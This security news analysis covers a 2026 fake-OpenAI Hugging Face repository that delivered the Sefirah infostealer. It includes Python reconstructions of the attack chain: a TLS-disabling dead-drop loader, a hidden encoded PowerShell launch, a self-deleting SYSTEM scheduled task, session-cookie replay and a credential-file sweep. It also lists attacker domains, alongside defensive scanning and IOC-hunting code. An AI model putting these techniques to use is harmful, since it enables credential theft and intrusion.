The Era of AI Typosquatting: How a Fake OpenAI Repository Weaponized Hugging Face
The artificial intelligence boom has revolutionized the software development lifecycle, but it has simultaneously introduced a massive, largely unregulated attack surface. In one of the most sophisticated AI supply chain attacks seen to date, threat actors hijacked the trust associated with top-tier AI labs to deliver devastating malware.
A malicious Hugging Face model repository masquerading as an official OpenAI release breached the platform’s defenses, rapidly ascending to the #1 trending spot. By the time security teams intervened, the fake repository had accumulated over 244,000 downloads and hundreds of likes.
While early reports indicate that these engagement metrics were likely inflated by bot accounts, the core reality remains alarming. The malicious repository, Open-OSS/privacy-filter, was explicitly designed to prey on developers seeking OpenAI’s newly released data redaction model.
This was not a simple smash-and-grab phishing attempt. Instead, it was a carefully orchestrated deployment of a Rust-based infostealer on Windows systems, delivered under the guise of machine learning evaluation workflows. Reporting from The Hacker News, Rescana, and CSO Online paints a picture of a patient, highly capable threat actor exploiting the unique vulnerabilities of modern AI model distribution.
The Catalyst: Weaponizing the OpenAI Privacy Filter Release
To understand the genius—and the danger—of this typosquatting campaign, we must look at the timeline. In late April 2026, OpenAI legitimately released a powerful open-weight model dubbed “Privacy Filter.” Hosted under the official openai/privacy-filter namespace, this bidirectional token classifier featured 1.5 billion parameters.
Its explicit purpose was to detect and redact personally identifiable information (PII) from unstructured text, offering enterprise developers a tool with a massive 128,000-token context window. The release was highly anticipated, distributed under an Apache 2.0 license, and intended for immediate corporate adoption to ensure data privacy.
The threat actors capitalized on this exact moment of high visibility and high urgency. They created the lookalike Open-OSS namespace and copied the official OpenAI model card practically verbatim. When developers rushed to Hugging Face to test the new redaction capabilities, many inevitably stumbled into the typosquatted trap.
In the fast-paced world of generative AI, the “clone-and-run” workflow is the standard operating procedure. Developers are deeply conditioned to pull repositories, install dependencies, and execute initialization scripts without conducting thorough line-by-line code reviews. The attackers knew this, embedding their initial access vector natively within the expected setup instructions.
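To see how little friction stands between a developer and the payload, consider the kind of quickstart a model card typically shows. The snippet below is a hypothetical sketch of that workflow, not the repository’s actual instructions:

```python
# A hypothetical "clone-and-run" quickstart of the kind a model card
# presents; this is not the repository's actual code.
from huggingface_hub import snapshot_download

# One lookalike namespace is all that separates the official release
# ("openai/privacy-filter") from the typosquat ("Open-OSS/privacy-filter").
local_dir = snapshot_download("openai/privacy-filter")

# The malicious model card then instructs the developer to run
# `python loader.py` -- the step most people perform without reading
# the script first.
print(f"Model files downloaded to {local_dir}")
```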
The Dead Drop Resolver: Deconstructing the Loader Logic
Unlike legacy software supply chain attacks that hide payloads deep inside obfuscated compiled binaries, this campaign leveraged the very open-source nature of Python. According to threat intelligence reports from HiddenLayer and detailed by TechRadar, the execution chain began when the victim ran a seemingly benign setup script: either loader.py for Linux/macOS or start.bat for Windows environments.
The technical brilliance of loader.py lies in its operational security. Upon execution, the malicious Python loader immediately disabled SSL certificate verification. It then decoded a Base64-encoded URL pointing to JSON Keeper, a legitimate, public JSON hosting service.
By utilizing JSON Keeper, the threat actors employed a classic espionage technique known as a “dead drop resolver.” This architectural choice is highly significant. It allowed the attackers to completely decouple their command-and-control (C2) instructions from the Hugging Face model registry itself.
If security researchers or Hugging Face automated scanners attempted to statically analyze the repository, they would only find a link to a benign paste service. Meanwhile, the attackers could dynamically update the JSON payload hosted on JSON Keeper at any time, pivoting their attack infrastructure and bypassing static blocklists without ever altering the repository code.
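Public reporting makes the loader’s shape clear enough to reconstruct in outline. The following is an illustrative reconstruction of that pattern with a benign placeholder URL, not the actual malicious source:

```python
# Illustrative reconstruction of the reported loader pattern -- not the
# actual malicious source. The URL is a benign placeholder.
import base64
import json
import ssl
import urllib.request

# Step 1: disable certificate verification so the fetch never fails on
# interception proxies or stale trust stores.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Step 2: the repository only ever contains an opaque Base64 blob, so a
# static scan sees a string, not a URL. (Computed here to stay benign;
# the real loader hard-codes the encoded value.)
ENCODED = base64.b64encode(b"https://example.com/dead-drop.json").decode()
dead_drop_url = base64.b64decode(ENCODED).decode()

# Step 3: the JSON hosted on the paste service is the real directive.
# The attacker can rewrite it at any time without touching the repo.
with urllib.request.urlopen(dead_drop_url, context=ctx) as resp:
    directive = json.loads(resp.read())
```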
Privilege Escalation and Evasion Mechanics
Once the payload instruction was retrieved from the dead drop, the execution chain pivoted into native system exploitation. The JSON payload commanded the Python script to trigger a hidden, Base64-encoded PowerShell command.
This PowerShell command subsequently reached out to an attacker-controlled remote server, specifically api.eth-fastscan[.]org, to pull down a secondary batch script. This is where the attack shifted from basic code execution to a deeply embedded system compromise.
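The hand-off itself relies on a standard PowerShell feature: -EncodedCommand accepts a Base64-encoded, UTF-16LE script, so the loader never has to expose a readable command string. A benign sketch of that invocation pattern, with placeholder content:

```python
# Benign sketch of the hidden PowerShell invocation pattern; the real
# payload fetched a batch script from attacker infrastructure instead.
import base64
import subprocess

ps_script = 'Write-Output "stage two would be fetched here"'  # stand-in

# -EncodedCommand expects Base64 over UTF-16LE, letting a loader pass
# an arbitrary script with no quoting and no readable command line.
encoded = base64.b64encode(ps_script.encode("utf-16-le")).decode()

subprocess.run([
    "powershell.exe",
    "-NoProfile",
    "-WindowStyle", "Hidden",  # no console window for the victim to see
    "-EncodedCommand", encoded,
])
```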
The secondary batch script requested elevation by deliberately triggering a User Account Control (UAC) prompt. Relying on the developer’s assumption that the “OpenAI” model simply required administrative rights to configure the local environment, many victims clicked “Yes.”
Armed with elevated privileges, the script systematically dismantled local defenses. It added aggressive exclusions to Microsoft Defender Antivirus to ensure the final payload would not be quarantined. Furthermore, it configured a scheduled task on the host machine designed to mimic a background Microsoft Edge update.
The task’s configuration was unusual. As The Hacker News highlighted in its breakdown, it was not meant for long-term persistence. Instead, it served as a “one-shot SYSTEM-context launcher”: after triggering the final executable, the malware waited exactly two seconds and then deleted the scheduled task entirely. By destroying the task before the next system reboot, the attackers evaded behavioral monitoring tools that flag suspicious long-term startup routines.
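Reconstructed in outline, the reported pattern looks something like the sketch below; the task name and payload path are illustrative stand-ins, not the campaign’s actual values:

```python
# Sketch of the reported "one-shot SYSTEM-context launcher". The task
# name and payload path are illustrative stand-ins. Creating a task
# with /RU SYSTEM requires the elevated context the UAC step provided.
import subprocess
import time

TASK = "MicrosoftEdgeUpdateTaskMachineCore"  # mimics a real updater task
PAYLOAD = r"C:\ProgramData\payload.exe"      # illustrative path

subprocess.run(["schtasks", "/Create", "/F", "/TN", TASK, "/TR", PAYLOAD,
                "/SC", "ONCE", "/ST", "00:00",
                "/RU", "SYSTEM", "/RL", "HIGHEST"], check=True)

subprocess.run(["schtasks", "/Run", "/TN", TASK], check=True)

time.sleep(2)  # the reported two-second pause

# Deleting the task immediately leaves nothing for boot-time
# persistence scanners to find.
subprocess.run(["schtasks", "/Delete", "/TN", TASK, "/F"], check=True)
```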
The Rust-Based Sefirah Infostealer
The culmination of this complex kill chain was the deployment of “Sefirah,” a highly capable Rust-based infostealer. Rust is increasingly favored by modern malware authors due to its memory safety features, cross-platform compilation capabilities, and the difficulty reverse engineers face when analyzing its complex, LLVM-compiled binaries.
Sefirah did not waste time once it achieved execution. The infostealer’s primary objective was the wholesale exfiltration of high-value developer secrets. It aggressively targeted Chromium and Gecko-based web browsers, stripping out cookies, saved passwords, encryption keys, and active session tokens.
Because modern corporate environments often rely on multi-factor authentication (MFA), stealing a password is no longer sufficient. By exfiltrating raw session cookies, the attackers could execute “pass-the-cookie” attacks, entirely bypassing MFA requirements to access corporate cloud consoles and internal applications.
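A hypothetical replay shows why this works: the cookie itself is the proof of a completed login, so presenting it yields an authenticated session with no password or MFA challenge. All names and values below are placeholders:

```python
# Hypothetical "pass-the-cookie" replay; every name and value here is a
# placeholder. The cookie is the proof of a completed login, so no
# password or MFA challenge is ever triggered.
import requests

stolen = {"__Secure-session": "eyJhbGciOi..."}  # exfiltrated session cookie

resp = requests.get("https://console.example-cloud.com/dashboard",
                    cookies=stolen)
print(resp.status_code)  # 200 means the victim's session was reusable
```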
The payload also specifically hunted for Discord local storage tokens, FileZilla FTP configurations, VPN credentials, and SSH master keys. Furthermore, it aggressively parsed the local filesystem for cryptocurrency wallet extensions and plaintext seed phrases, highlighting a dual motive of corporate espionage and direct financial theft.
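The sweep itself needs no exotic tooling; the target locations are well-documented application defaults. A rough sketch of the pattern follows (Sefirah’s exact target list has not been published in full):

```python
# Sketch of the filesystem sweep described above. The paths are
# well-known application defaults; Sefirah's exact target list has not
# been published in full.
import os
from pathlib import Path

appdata = Path(os.environ.get("APPDATA", ""))

targets = [
    appdata / "discord" / "Local Storage" / "leveldb",  # Discord tokens
    appdata / "FileZilla" / "recentservers.xml",        # saved FTP servers
    Path.home() / ".ssh",                               # SSH private keys
]

existing = [p for p in targets if p.exists()]

# Crude seed-phrase heuristic: flag small text files that consist of
# exactly 12 or 24 lowercase words (the most common BIP-39 lengths).
def looks_like_seed_phrase(path: Path) -> bool:
    words = path.read_text(errors="ignore").split()
    return len(words) in (12, 24) and all(w.isalpha() for w in words)
```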
To protect its operations, Sefirah executed rigorous anti-analysis checks. It verified that it was not running within a virtual machine or a researcher’s sandbox. It actively sought out connected debuggers. More aggressively, it attempted to forcefully blind the operating system by disabling the Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), effectively shutting off the telemetry that Endpoint Detection and Response (EDR) platforms rely on.
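The specific checks Sefirah performs have not been published in detail, but the general shape of such environment fingerprinting is well known. A simplified Python illustration using common public heuristics (the real checks are implemented in Rust and go further, including the AMSI and ETW tampering described above):

```python
# Simplified illustration of environment fingerprinting. The real
# checks are implemented in Rust and go further (debugger detection,
# AMSI and ETW tampering); these values are common public heuristics.
import os
import uuid

# OUI prefixes registered to VMware, VirtualBox, and Hyper-V adapters.
VM_MAC_PREFIXES = ("00:05:69", "00:0c:29", "00:50:56", "08:00:27", "00:15:5d")

SANDBOX_USERS = {"sandbox", "maltest", "virus", "sample"}

def probably_analyzed() -> bool:
    raw = f"{uuid.getnode():012x}"
    mac = ":".join(raw[i:i + 2] for i in range(0, 12, 2))
    if mac.startswith(VM_MAC_PREFIXES):
        return True
    if os.environ.get("USERNAME", "").lower() in SANDBOX_USERS:
        return True
    # Minimal analysis VMs are often provisioned with a single CPU core.
    return (os.cpu_count() or 2) < 2
```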
All successfully harvested data was bundled into JSON format and exfiltrated via HTTP POST requests to a final C2 domain, recargapopular[.]com.
The Silver Fox Connection: A Pivot to the AI Supply Chain
Perhaps the most fascinating element of this incident is the underlying threat actor attribution. While the attack on Hugging Face appears novel, the infrastructure points to an established, highly aggressive advanced persistent threat.
Researchers tracing the activity surrounding the api.eth-fastscan[.]org domain made a critical discovery. This exact same domain was simultaneously observed serving a completely different executable (o0q2l47f.exe), which was beaconing back to a C2 server at welovechinatown[.]info.
This secondary infrastructure is notorious within the threat intelligence community. It has been conclusively linked to prior campaigns distributing “ValleyRAT” (specifically the Winos 4.0 variant), a modular remote access trojan attributed exclusively to the sophisticated Chinese hacking collective known as “Silver Fox.”
Historically, Silver Fox has relied on SEO poisoning and traditional phishing emails to distribute their payloads. Recently, they were spotted utilizing malicious npm packages in JavaScript environments. Their sudden pivot to the Hugging Face model registry represents a massive escalation.
This indicates that top-tier threat actors have recognized that machine learning artifacts represent a soft underbelly in enterprise security. By exploiting the hype surrounding Generative AI, these groups can bypass hardened perimeter defenses and land their payloads directly onto the high-powered, highly privileged workstations of corporate data scientists and AI engineers.
The Failure of Traditional SCA and the Call for AI-BOMs
This incident lays bare a fundamental flaw in how the cybersecurity industry currently approaches supply chain defense. For the past decade, the industry has heavily invested in Software Composition Analysis (SCA) tools. These tools are excellent at scanning package.json or requirements.txt files to identify known vulnerabilities (CVEs) in open-source libraries.
However, traditional SCA tools are completely blind to the risks posed by modern AI artifacts. AI model repositories do not just contain code libraries; they contain massive arrays of serialized weights, custom inference scripts, and complex Python loaders. As noted by analysts at Gartner in CSO Online, traditional SCA was designed to inspect dependency manifests, not the nuanced, executable behaviors concealed within a machine learning model’s setup files.
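To make the gap concrete, here is a deliberately crude behavior-oriented check that would flag every loader trick described in this article, none of which a manifest-based scanner ever inspects. The patterns are illustrative heuristics, not a production scanner:

```python
# Deliberately crude behavior-oriented audit. These regexes are
# illustrative heuristics, not a production scanner; they flag the
# specific loader tricks described in this article.
import re
from pathlib import Path

RISKY_PATTERNS = {
    "disables TLS verification": re.compile(r"CERT_NONE|verify\s*=\s*False"),
    "decodes embedded Base64":   re.compile(r"b64decode"),
    "spawns a shell":            re.compile(r"subprocess|os\.system|powershell", re.I),
}

def audit_model_repo(repo_dir: str) -> None:
    for script in Path(repo_dir).rglob("*.py"):
        text = script.read_text(errors="ignore")
        for label, pattern in RISKY_PATTERNS.items():
            if pattern.search(text):
                print(f"[!] {script}: {label}")

# audit_model_repo("./privacy-filter")  # worth running before `python loader.py`
```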
This glaring gap has prompted a fierce debate among security professionals. On one side are the proponents of frictionless innovation, arguing that platforms like Hugging Face have democratized AI precisely because they allow instant, barrier-free access to bleeding-edge models.
On the other side are cybersecurity purists who argue that the current state of public AI repositories is fundamentally reckless. There is a growing consensus that enterprises must implement strict, registry-layer governance. This includes the mandatory adoption of the AI Bill of Materials (AI-BOM). An AI-BOM would provide cryptographic verification of a model’s origin, a strict inventory of its training data provenance, and a detailed map of its executable components.
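In miniature, registry-layer verification could look like the sketch below: every artifact in a downloaded model is pinned to a hash recorded in a manifest. The manifest format here is invented for illustration; real schemas such as CycloneDX’s ML-BOM profile are considerably richer:

```python
# Miniature AI-BOM verification: pin each artifact to a recorded hash.
# The manifest format is invented for illustration; real schemas such
# as CycloneDX's ML-BOM profile are considerably richer.
import hashlib
import json
from pathlib import Path

def sha256(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_against_bom(repo_dir: str, bom_path: str) -> bool:
    bom = json.loads(Path(bom_path).read_text())
    clean = True
    for artifact in bom["artifacts"]:  # [{"path": ..., "sha256": ...}]
        actual = sha256(Path(repo_dir) / artifact["path"])
        if actual != artifact["sha256"]:
            print(f"[!] hash mismatch: {artifact['path']}")
            clean = False
    return clean
```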
Mitigating the Blast Radius
For organizations that interacted with the Open-OSS/privacy-filter repository, the remediation required is extensive. The presence of Sefirah on a developer’s machine means that simple antivirus quarantines are insufficient.
Because the infostealer explicitly targeted session tokens and SSH keys, any system that ran the fake loader must be considered catastrophically compromised. Security teams must enforce immediate, bare-metal reimaging of the affected endpoints. Furthermore, because stolen session tokens can be used from remote attacker infrastructure, simply wiping the laptop does not stop the bleeding.
Organizations must comprehensively rotate all exposed credentials, aggressively invalidate all active browser sessions across cloud environments, and replace all cryptographic keys that resided on the affected host. Network telemetry should be heavily scrutinized for any historical outbound connections to the known indicators of compromise, specifically api.eth-fastscan[.]org and recargapopular[.]com.
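A starting point for that retrospective hunt, assuming flat logs with one hostname or URL per line (the format is an assumption; adapt the parsing to your own telemetry):

```python
# Retrospective IOC hunt over flat log files. Assumes one hostname or
# URL per line; adapt the parsing to your own telemetry format.
from pathlib import Path

IOCS = ("api.eth-fastscan.org", "recargapopular.com", "welovechinatown.info")

def hunt(log_file: str) -> None:
    for n, line in enumerate(Path(log_file).read_text().splitlines(), start=1):
        if any(ioc in line for ioc in IOCS):
            print(f"{log_file}:{n}: {line.strip()}")

# hunt("proxy-2026-04.log")  # illustrative filename
```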
Conclusion: A Wake-Up Call for the AI Ecosystem
The typosquatting of the OpenAI Privacy Filter is a watershed moment for artificial intelligence security. It proves that the same supply chain vulnerabilities that have plagued npm, PyPI, and RubyGems have successfully migrated to the machine learning ecosystem.
As developers continue to rapidly integrate open-source AI models into enterprise applications, they must abandon the blind trust currently afforded to platforms like Hugging Face. Unless the industry collectively transitions toward cryptographically signed models, strict AI-BOM mandates, and behavior-aware artifact scanning, the AI revolution will continue to serve as a highly lucrative delivery mechanism for the world’s most advanced cybercriminals.